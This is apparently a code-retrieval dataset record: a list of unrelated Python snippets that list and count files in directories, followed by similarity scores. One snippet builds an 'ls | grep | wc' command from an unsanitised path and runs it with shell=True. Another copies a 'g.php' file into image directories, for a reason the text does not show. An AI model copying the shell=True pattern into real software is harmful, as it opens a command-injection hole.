'+str(os.path.isdir(directory_name))\n\t\tif not os.path.isdir(directory_name): \n\t\t\tos.makedirs(directory_name)\n\t\tif \"images\" in directory_name: shutil.copy(path+'/g.php',path+'/'+directory_name+'/g.php')", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. 
Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def _discover_in_dir(self, dir_path: str) -> Optional[str]:\n for this_file in os.listdir(dir_path):\n if this_file.endswith('.esvi'):\n return os.path.join(dir_path, this_file)\n\n return None", "def all_loci():\n for fname in listdir(join(DATA_PATH, 'loci')):\n try:\n yield fetch_locus(fname)\n except Exception as e:\n print(f'{repr(e)} fetching {fname}')", "def list_dir(self, path):", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def find_vasp_calculations():\n dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml\", recursive=True)\n ]\n gz_dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\\.gz\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml.gz\", recursive=True)\n ]\n return dir_list + gz_dir_list", "def findMayaFiles(directory):\n\n pass", "def __calculate_current_row(self):\n last_data_file = None\n location = os.listdir(self.path)\n #Remove non-data files from our list of dirs.\n location = [element for element in location if 'data' in element]\n #Sort as integers so we get them in the right order.\n location = sorted(location, key=lambda x: int(x.split('.')[0].split('_')[1]), reverse = True)\n for f in location:\n if f[0:4] == 'data':\n last_line = None\n with open(self.path + '/' + f, 'r') as f:\n for line in f:\n if len(line) > 1:\n last_line = line\n if last_line:\n return json.loads(line)['row_id']\n\n return 0", "def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def import_directory(self, directory):\n files_list = sys_utils.get_files_from_directory(directory)\n if files_list == None:\n return None, 0\n oids = []\n num_new_files = 0\n p = progress.progress(len(files_list))\n for file_location in files_list:\n oid, new_file = self.import_file(file_location)\n p.tick()\n if oid:\n oids.append(oid)\n if new_file:\n num_new_files += 1\n oids = list(set(oids)) # assert uniqueness \n return oids, num_new_files", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def _get_base_files(self):\n setup_file = path.join(self.PyCogentDirectory, 'setup.py')\n #reqs_file = path.join(self.PyCogentDirectory, 'cogent-requirements.txt')\n #return [(setup_file, 'Python'), (reqs_file, 'Properties')]\n return [(setup_file, 'Python')]", "def get_nb_files(directory):\r\n if not os.path.exists(directory):\r\n return 0\r\n cnt = 0\r\n for r, dirs, files in os.walk(directory):\r\n for dr in 
dirs:\r\n cnt += len(glob.glob(os.path.join(r, dr + \"/*\"))) # glob模块是用来查找匹配文件的,后面接匹配规则。\r\n return cnt", "def file_stat(self, file_path):", "def main():\n results = []\n results.extend(check_mounts())\n results.extend(diskusage())\n return results", "def get_number_of_files(directory: str):\n\n number_of_files = len([item for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(number_of_files)\n return number_of_files", "def getNFiles(self, config, base, logger=None):\n if 'nfiles' in config:\n return galsim.config.ParseValue(config, 'nfiles', base, int)[0]\n else:\n return 189", "def get_info(self):\n if os.path.isfile(self.path):\n total_size = os.path.getsize(self.path)\n total_files = 1\n elif os.path.exists(self.path):\n total_size = 0\n total_files = 0\n for x in os.walk(self.path):\n for fn in x[2]:\n fpath = os.path.normpath(os.path.join(x[0], fn))\n rel_path = os.path.relpath(fpath, self.path)\n if any(fnmatch.fnmatch(rel_path, ext) for ext in self.exclude):\n continue\n fsize = os.path.getsize(fpath)\n if fsize and not is_hidden_file(fpath):\n total_size += fsize\n total_files += 1\n else:\n raise exceptions.InvalidInputException\n if not (total_files and total_size):\n raise exceptions.EmptyInputException\n if self.piece_size:\n ps = self.piece_size\n else:\n ps = 1 << max(0, math.ceil(math.log(total_size / 1500, 2)))\n if ps < MIN_PIECE_SIZE:\n ps = MIN_PIECE_SIZE\n if ps > MAX_PIECE_SIZE:\n ps = MAX_PIECE_SIZE\n return (total_size, total_files, ps, math.ceil(total_size / ps))", "def get_testing_data(self):\n\n print 'Loading testing data ', self.test_folder , '...'\n test_text = []\n cnt = 0\n\n for f in listdir(self.test_folder):\n file_path = join(self.test_folder, f)\n if isfile(file_path):\n cnt += 1\n if cnt % 10000 == 0:\n print 'finished:', cnt # line counter\n self.test_index.append(f[:-4])\n with open(file_path, 'rb') as f:\n test_text.append( f.read() )\n\n return test_text", "def perform_calculations():\n # contains the result of the total repositories\n result = [] \n count_all_lines = 0 # mainatains the line that has been counted\n for_loops_list = []\n func_parameters = [] # function parameter checks list\n no_of_variables = set() # a set containing variables\n docs_comments = [] \n single_line_comments = []\n code_duplication = 0\n repo_imports_set = set() # imports for the entire repo\n current_repo = ''\n for item in traverse_repos():\n current_repo = item['repo_url']\n for path in item['files']:\n with open(path, 'r') as file_:\n lines = file_.readlines()\n # call code duplication\n code_duplication += code_duplication_check(lines)\n for line in lines:\n if re.match(r'^#.+', line.strip()):\n single_line_comments.append(line.strip())\n # this makes it possible to campare later\n # call find_repo_imports\n line_import = find_repo_imports(line)\n \n repo_imports_set.add(line_import)\n # call countlines of code function\n count_all_lines += count_lines_of_code(line.strip())\n # call find_for_loops\n for_loops = find_for_loops(line)\n if for_loops:\n for_loops_list.append(for_loops)\n function = avarage_parameters(line)\n if function:\n func_parameters.append(avarage_parameters(line))\n no_of_variables.add(avarage_variables_per_line(line))\n\n with open(path, 'r') as content_file:\n content = content_file.read()\n docs_comments.extend(find_docstrings_and_comments(content, single_line_comments))\n \n \n\n external_packages = find_external_packages(repo_imports_set)\n repo_lines_of_codes = count_all_lines - len(docs_comments)\n 
avarage_variables_repo = (len(no_of_variables)-1) / repo_lines_of_codes\n nesting = nesting_depth(for_loops_list) / len(for_loops_list)\n avarage_params = sum(func_parameters) / len(func_parameters)\n repo_result = {\n 'repository_url': current_repo, \n 'number of lines': repo_lines_of_codes, \n 'libraries': external_packages,\n 'nesting factor': nesting,\n 'code duplication': code_duplication,\n 'average parameters': avarage_params,\n 'average variables': avarage_variables_repo\n \n }\n result.append(repo_result)\n\n return result", "def summarize(path: str) -> dict:\n results = parse_bactopia_directory(path)", "def read_file_names(self):\n files_BIDMC = os.listdir(self.root_dir_BIDMC)\n masks_BIDMC = os.listdir(self.seg_dir_BIDMC)\n files_HK = os.listdir(self.root_dir_HK)\n masks_HK = os.listdir(self.seg_dir_HK)\n files_I2CVB = os.listdir(self.root_dir_I2CVB)\n masks_I2CVB = os.listdir(self.seg_dir_I2CVB)\n files_ISBI = os.listdir(self.root_dir_ISBI)\n masks_ISBI = os.listdir(self.seg_dir_ISBI)\n files_ISBI_15 = os.listdir(self.root_dir_ISBI_15)\n masks_ISBI_15 = os.listdir(self.seg_dir_ISBI_15)\n files_UCL = os.listdir(self.root_dir_UCL)\n masks_UCL = os.listdir(self.seg_dir_UCL)\n site_files = [files_BIDMC, files_HK, files_I2CVB, files_ISBI, files_ISBI_15, files_UCL]\n site_masks = [masks_BIDMC, masks_HK, masks_I2CVB, masks_ISBI, masks_ISBI_15, masks_UCL]\n return site_files, site_masks", "def compute_code():\n for file in os.listdir('./src/Templates'):\n input.parse_template('./src/Templates/' + file, './student/' + file + '.py')\n data = input.load_input()\n return len([k for k in data['input'].keys() if '@' not in k])", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def calculate(d):\r\n\r\n # Set correct slashes for the OS\r\n if sys.platform == 'windows':\r\n slash = '\\\\'\r\n elif sys.platform == 'linux':\r\n slash = '/'\r\n else:\r\n print('#Error. Unknown platform.')\r\n return\r\n\r\n print('Files in the current directory and their md5-hashes:\\n')\r\n i = 0\r\n assert i == 0, '#Error. 
Variable i != 0.'\r\n\r\n for i in range(len(d[2])): # Go through the list of files\r\n full_path = d[0]+slash+d[2][i]\r\n print(full_path) # Get the list of files with full paths\r\n print(md5(full_path))\r\n size(full_path)", "def find_data(self):\n data_list = []\n for root, dirs, files in os.walk(pathfinder.data_path()):\n for name in files:\n data_list.append(os.path.join(root, name))\n return data_list", "def count_files_dir(self,full_path):\n try:\n num_files = len([name for name in os.listdir(full_path) if os.path.isfile(self.FILENAME)])\n print(f\"Number of files in {full_path} is {num_files}\")\n return num_files\n except Exception as e:\n raise SystemExit(f\"Could not complete operation: {e}\")", "def read_inputs(self):\n curdir = os.getcwd()\n os.chdir(self.fst_dir)\n rstat = self.readFST()\n if rstat == 0:\n os.chdir(curdir)\n return 0\n # the names of the next files are either set by caller or come from the reading the FAST file\n rstat = self.readNoise()\n rstat = self.readAD()\n rstat = self.readBlade()\n rstat = self.readPtfm()\n os.chdir(curdir)", "def getAllVCFs(inputFolder):\n listOfFiles = []\n numErrors = 0\n for folder in os.listdir(inputFolder): #Loop through all folders\n # print(folder)\n try: # using a try-xcept block to avoid errors with other files \n # not following this structure\n # TODO: make this cleaner\n vcfLoc = os.path.join(inputFolder, os.path.join(folder, \"pilon/\"))\n # print(vcfLoc)\n for potentialFile in os.listdir(vcfLoc):\n # print(potentialFile)\n if(potentialFile.endswith(\".vcf.gz\")):\n listOfFiles.append(os.path.join(vcfLoc, potentialFile))\n except:\n # print(\"error at \" + folder)\n numErrors += 1\n print(numErrors)\n return listOfFiles", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def get_amount_by_file(path):\n if os.stat(path).st_size == 0:\n raise Exception\n with open(path, 'r') as file:\n items = file.read().split(',')\n total = reduce(lambda x, y: int(x) + int(y), items)\n return total", "def readNSRelaxFiles(folder_path):\n\n run_arr = []\n Nrun_arr = []\n dod_arr = []\n crate_arr = []\n count=0\n\n # find number of files that starts with run\n # (this is the data file we want to read)\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun\"):\n count+=1\n\n # order the data files by run number, so we get descending crates\n Nrun=1\n for i in range(count+5):\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun_\"+str(Nrun)+\"_\"):\n run_arr.append(file)\n dod = re.search('dod=(.*).txt', file).group(1)\n crate = re.search('Crate=(.*)_',file).group(1)\n Nrun_arr.append(np.round(int(Nrun),decimals=0))\n dod_arr.append(float(dod))\n crate_arr.append(float(crate))\n Nrun+=1\n print(len(run_arr))\n\n return run_arr, Nrun_arr, dod_arr, crate_arr", "def _determine_local_import_names(start_dir):\n file_ext_pairs = [os.path.splitext(path) for path in os.listdir(start_dir)]\n return [\n basename\n for basename, extension\n in file_ext_pairs\n if extension == '.py' or os.path.isdir(\n os.path.join(start_dir, basename))\n and basename not in ('__pycache__')]", "def get_results_labels(dir_path):\n dx = 0\n directories = [dI for dI in os.listdir(dir_path)\n if os.path.isdir(os.path.join(dir_path, dI))]\n results = []\n\n for directory in directories:\n # collect the path to all results files\n path = os.path.join(dir_path, directory)\n files = [os.path.join(path, f) for f in 
os.listdir(path)\n if os.path.isfile(os.path.join(path, f))\n and 'results' in f]\n\n # if the directory does not have results files, move on to the next\n if len(files) == 0:\n continue\n\n # collect the average cumulative returns per training iteration\n res = []\n lengths = []\n for i, f in enumerate(files):\n data = pd.read_csv(f)\n if i == 0:\n dx = data['total/steps'][2] - data['total/steps'][1]\n res.append(data['rollout/return_history'])\n lengths.append(len(data['rollout/return_history']))\n\n res = [[r[:min(lengths)]] for r in res]\n results.append(np.concatenate(res, axis=0))\n\n return results, directories, dx", "def get_python_files(all_files=None):\n if all_files is None:\n all_files = ci_diff_helper.get_checked_in_files()\n\n production_files = []\n test_files = []\n for filename in all_files:\n if not valid_filename(filename):\n continue\n if is_test_filename(filename):\n test_files.append(filename)\n else:\n production_files.append(filename)\n\n return production_files, test_files", "def reportinfo(self):\n return super().reportinfo()[:2] + (self.fspath.relto(os.getcwd()),)", "def count_dirs_and_files(directory='.'):\n pass", "def ttl_files_in_dir(dir_path, pat='.'):\n if not path.isdir(dir_path):\n raise NotADirectoryError\n\n # In a subprocess, count list the files in the dir and count them, convert output to an int\n ttl = int(check_output('ls -A -U --color=never {} | grep {} | wc -l'.format(dir_path, pat), shell=True).strip())\n\n return ttl", "def count(train_dir):\r\n path = train_dir\r\n count = 0\r\n for fn in os.listdir(path): #fn 表示的是文件名\r\n count = count + 1\r\n return count", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number" ]
[ "0.6993405", "0.6395879", "0.614925", "0.5898231", "0.57934844", "0.5683392", "0.56749487", "0.56739736", "0.56560665", "0.559616", "0.55468976", "0.5527279", "0.55094504", "0.5491219", "0.54559195", "0.5373519", "0.5360052", "0.53304", "0.5296416", "0.5291369", "0.5234145", "0.52289695", "0.52206385", "0.51996464", "0.51954573", "0.5185844", "0.51648813", "0.5164462", "0.5134597", "0.512213", "0.51164156", "0.5109861", "0.5107807", "0.5084028", "0.5082196", "0.5081326", "0.5079591", "0.5077953", "0.50771743", "0.5071418", "0.50705975", "0.50595474", "0.5058926", "0.505754", "0.50533324", "0.50512177", "0.5047785", "0.50470525", "0.5042362", "0.5040497", "0.5040322", "0.5037387", "0.50322455", "0.50297064", "0.50276005", "0.500657", "0.50051033", "0.5001271", "0.49973717", "0.4996412", "0.4988866", "0.49884328", "0.49881095", "0.4988084", "0.4985919", "0.4985775", "0.49802762", "0.49781474", "0.49727693", "0.49710363", "0.4970427", "0.4967399", "0.49543992", "0.49536684", "0.49421307", "0.49418175", "0.4932748", "0.49326763", "0.4925025", "0.4924283", "0.49241623", "0.4922814", "0.49208128", "0.49176306", "0.49172363", "0.49107918", "0.4906243", "0.49041766", "0.49032098", "0.4887595", "0.4887065", "0.4885747", "0.48812976", "0.48807985", "0.48778835", "0.48746076", "0.4872828", "0.48676902", "0.4861506", "0.48572385", "0.4850339" ]
0.0
-1
Just return the version number
def _sendVersion_result (self, (code, data)) :
    assert code == "REPLY_HELLO"

    return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_number() -> int:\n return 0", "def get_version():\n return '%d.%d.%d' % version_info", "def get_version():\n return 1", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version(self):\n a = re.search('(?<=_V)\\d{1,2}', self.fname)\n if a is None:\n return None\n else:\n return int(a.group())", "def version(self):\n _, body = self.request('/', 'GET')\n return body.get('version', None)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_version(self):\n return 0", "def get_version():\n click.echo(get_current_version_number())", "def _get_version(self):", "def get_version(self) -> str:\n return versioning.get_version()", "def get_version(self):\n pass", "def getVersion(self):\n return self.get('Version', type=\"numeric\")", "def get_version(self):\n return self.version", "def get_version():\r\n return __version__", "def version(self):\n return \"%d.%d\" % (self._vmajor, self._vminor)", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_version():\n return about.get_version()", "def get_version(self):\n return self.__make_api_call('get/version')", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def version_number(path: str) -> str:\n exp = r'__version__[ ]*=[ ]*[\"|\\']([\\d]+\\.[\\d]+\\.[\\d]+[\\.dev[\\d]*]?)[\"|\\']'\n version_re = re.compile(exp)\n\n with open(path, 'r') as fqe_version:\n version = version_re.search(fqe_version.read()).group(1)\n\n return version", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def version(self):\n return self._get(\"version\")", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:", "def version():\n\n version = None\n output = gitopen(['--version'])\n m = re.search(br\" version ([\\d\\.A-Za-z]+)\", output)\n if m is not None:\n version = m.group(1).decode('utf-8')\n return version", "def version(self) -> Union[int, str]:", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def get_version(self):\n return self._version", "def get_version(self):\n return self._version", "def get_version() -> str:\n return __version__", "def get_version_number():\n return [0, 1, 0]", "def version():\n return __VERSION__", "def getversion(self):\n return self.__version", "def version():\n return '%d.%d' % (sys.version_info[0], sys.version_info[1])", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def get_version(self, params):\n return self.version", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n 
vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def get_version():\n return '.'.join(map(str, VERSION))", "def version(self):\r\n return self.version_guid", "def version():\n return uname().version", "def version():\n return uname().version", "def version():\n\n pass", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def version():\n\n print(VERSION_CODE)", "def _GetVersion(version_str):\n return int(version_str.split('.')[1])", "async def version(self):\n self.do(\"version\")\n return (await self.read(7)).strip()", "def version(self):\n if not self._version:\n self._version = self._get_version()\n\n return self._version", "def get_major_version(version):\n return str(check_version(version)[0])", "def get_version():\n\n with open('u2fval/__init__.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def version(self):\n self._get_latest_content()\n return self._data.get('version', None)", "def get_version(self):\n article_url = self.env[\"article_url\"]\n title = self.get_html_title(article_url)\n regex = r\"(?:(\\d+)\\.)?(?:(\\d+)\\.)?(\\*|\\d+)\"\n match = re.search(regex, title)\n if match:\n version = match.group(0)\n self.output(\"Version: {version}\".format(version=match.group(0)), 2)\n return version\n else:\n raise ProcessorError(\"Unable to determine version.\")", "def version_number(version_str):\n raise NotImplementedError", "def get_version(self):\n return version.__version__", "def get_version(self):\n return version.__version__", "def get_version():\n return magpy.get_version()", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def default_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"default_version_number\")", "def version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"version\")", "def version_min():\n return VERSION_MIN", "def version(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def version(self) -> int:\n return self._version", "def do_version(self):\n return \"1.0.0\", True", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version_tag(self, version: str) -> str:\n return version", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "async def version(self) -> str:\n response = await self._request(\"status\")\n return response[\"version\"]", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? 
why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def get_version() -> str:\n version = read(\"pdf_utils/__version__.py\")\n return re.search(r\"__version__ = \\\"(.*?)\\\"\", version).group(1)", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def get(self):\n return self._version", "def version():\n cmd = \"{} -v\".format(_detect_os())\n out = __salt__[\"cmd.run\"](cmd).splitlines()\n ret = out[0].split(\": \")\n return ret[1]", "def version(self):\n if \"version\" in self._prop_dict:\n return self._prop_dict[\"version\"]\n else:\n return None", "def get_version(self):\n return self.cur_config['version']['name']", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_version_special(name):\n\n module = import_module(name)\n if module:\n return module.version.VERSION\n else:\n return \"NA\"", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def version(self):", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def version(self): # -> string\n try:\n return gtts.version.__version__\n except (AttributeError, NameError):\n self.ok = False\n return \"\"", "def version(self) -> str:\n data = \"none yet\"\n if self.STARTED:\n data = (\n self.about.get(\"Version\")\n or self.about.get(\"Installed Version\")\n or \"DEMO\"\n )\n data = data.replace(\"_\", \".\")\n return data", "def version_info():\r\n return tuple(map(int, __version__.split('.')))", "def version_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"version_id\")", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_version(self):\n return self.api_version" ]
[ "0.8984848", "0.8674616", "0.83636147", "0.82080185", "0.81788445", "0.8116403", "0.81144017", "0.81124747", "0.8100697", "0.79934955", "0.79558516", "0.79138756", "0.790076", "0.78910106", "0.7832687", "0.7817467", "0.7802331", "0.7774403", "0.77695936", "0.77678406", "0.7761813", "0.7759757", "0.7759757", "0.7759757", "0.7743857", "0.77416784", "0.77416784", "0.77333814", "0.77295023", "0.77253145", "0.77253145", "0.770664", "0.770664", "0.770664", "0.770664", "0.770664", "0.77026904", "0.77026904", "0.76987904", "0.76900977", "0.7685675", "0.76807165", "0.7656677", "0.76563025", "0.7642019", "0.7635513", "0.76341605", "0.7613763", "0.7609877", "0.7595134", "0.7595134", "0.75860864", "0.75796926", "0.7563893", "0.7555708", "0.75490767", "0.7547525", "0.7541454", "0.75402254", "0.75389177", "0.7534869", "0.75305665", "0.75195247", "0.75195247", "0.7516664", "0.7503185", "0.750011", "0.7498429", "0.7498157", "0.7497113", "0.74946505", "0.74946505", "0.74946505", "0.74946505", "0.7489129", "0.7487392", "0.7486265", "0.74846685", "0.7483924", "0.74755365", "0.74751186", "0.7470983", "0.74702525", "0.7464067", "0.7460986", "0.7458248", "0.7445424", "0.74390155", "0.7435254", "0.7429707", "0.7425346", "0.7420233", "0.741576", "0.74154985", "0.7413534", "0.74085116", "0.7404157", "0.7403631", "0.7402403", "0.7393508", "0.7389227" ]
0.0
-1
Get the process status
def queryStatus (self) :
    return self.sendCommand("CMD_IN_QUERY_STATUS", "")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def status( self ):\n duration = datetime.datetime.now() - self.startTime\n status = {\n 'start': self.startTime.isoformat(),\n 'now': datetime.datetime.now().isoformat(),\n 'duration': duration.total_seconds(),\n 'bookmark': 0,\n 'events': 0,\n 'cumulative_rate': 0,\n 'processes': [],\n 'state': {\n 'id': self.state,\n 'description': definitions.STATE_STRING[self.state]\n }\n }\n\n # Sending pipes to processes which are not running or shutting down\n # will lead to errors and deadlocks. Loop through to detect errors.\n if self.state == definitions.STATE_RUNNING:\n # Loop through all processes and just check we're running properly\n for proxy in self.processes:\n if not proxy.process.is_alive():\n self.logger.info( 'Process {0} is dead.'.format( proxy.name ))\n self.state = definitions.STATE_ERROR\n break\n\n if proxy.request( 'status' )['state'] == definitions.STATE_ERROR:\n self.logger.info( 'Process {0} state is {1}.'.format(\n proxy.name,\n definitions.STATE_STRING[ definitions.STATE_ERROR ]\n ))\n\n self.state = definitions.STATE_ERROR\n break\n\n # Now do the actual status checks\n if self.state == definitions.STATE_RUNNING:\n # Loop through processes in order\n for proxy in self.processes:\n response = proxy.request('status')\n\n proc = {\n 'name': proxy.name,\n 'pid': proxy.process.pid,\n 'count': response['count'],\n 'sleep': response['sleep']\n }\n\n status['events'] = proc['count']\n status['processes'].append( proc )\n\n if 'bookmark' in response:\n status['bookmark'] = response['bookmark']\n\n status['cumulative_rate'] = round(\n status['events'] / duration.total_seconds(), 2)\n\n return status", "def _QueryProcessStatus(self, process):\n process_is_alive = process.is_alive()\n if not process_is_alive:\n return None\n\n rpc_client = self._rpc_clients_per_pid.get(process.pid, None)\n return rpc_client.CallFunction()", "def getstatus(self):\n return self.__status", "def status(self):\n import time\n if self._status == 'pending' and PIDWrap.count < PIDWrap.limit:\n self.begin()\n if self._status == 'running':\n ans = os.waitid(os.P_PID, self.pid, os.WEXITED | os.WNOHANG)\n if ans is None: \n if time.time() >= self.killat:\n os.kill(self.pid, 9)\n os.waitpid(self.pid, 0)\n self._status = 'wallclock timeout'\n else:\n self._status = 'running'\n elif ans.si_status == 24: self._status = 'cpu timeout'\n elif ans.si_status != 0: self._status = 'crashed'\n else: self._status = 'finished'\n if self._status != 'running': PIDWrap.count -= 1\n return self._status", "def get_status(self):\n\n return self._system", "def get_running_status(self):\n obj = ProcessInfo('jobs')\n process_list = obj.handle_parameter()\n if process_list:\n # get the hostname\n hostname = process_list[0]\n del process_list[0]\n process_list = obj.extract_process(process_list)\n # print 'dict is here$$$$$'\n dict_processor = []\n for proc_val in process_list:\n if proc_val.search_result ==0:\n dict_processor.append({'processor':proc_val.name,'status':'Stopped','PID':str(proc_val.pid)})\n elif proc_val.search_result >=1:\n dict_processor.append({'processor':proc_val.name,'status':'Running','PID':str(proc_val.pid)})\n # dict_processor[proc_val.name] = 'Running'\n # print (\"|%-20s|%-5s|\"%(proc_val.name,proc_val.search_result))\n # print dict_processor\n return dict_processor\n else:\n return False", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def get_status(self):\n return self.read_register(259, 0, 3)", "def get_status(self) -> bool:\n try:\n 
self.__driver.service.assert_process_still_running()\n return True\n except AttributeError:\n return False", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def status(self) -> pulumi.Output['outputs.JobStatus']:\n return pulumi.get(self, \"status\")", "def get_pid_status(pid):\n if pid != 0:\n pid_str = pid\n else:\n pid_str = 'self'\n\n # read procfs /proc/PID/stat file to get PID status\n try:\n with open(\"/proc/{}/stat\".format(pid_str)) as stat_file:\n # split by '(' and ')' needed\n # as processes/threads could have spaces in the name\n line_split = stat_file.readline().strip().split(')')\n pid_name = line_split[0].split('(')[1]\n state = line_split[1].strip().split(' ')[0]\n return state, state in PID_VALID_STATUS, pid_name\n except EnvironmentError:\n pass\n\n return 'E', False, ''", "def getstatus(self):\n status = dict(state=self.getstate(), runningcmd=None,\n current_exposure=self.current_exposure,\n max_exposures=self.max_exposures,\n statustime=str(datetime.now())[:-7],\n lastfile=self.lastfile)\n if self.process:\n status['lastcmd'] = self.process.args[0]\n status['lastreturn'] = self.process.poll()\n if status['state'] == 'running':\n status['runningcmd'] = 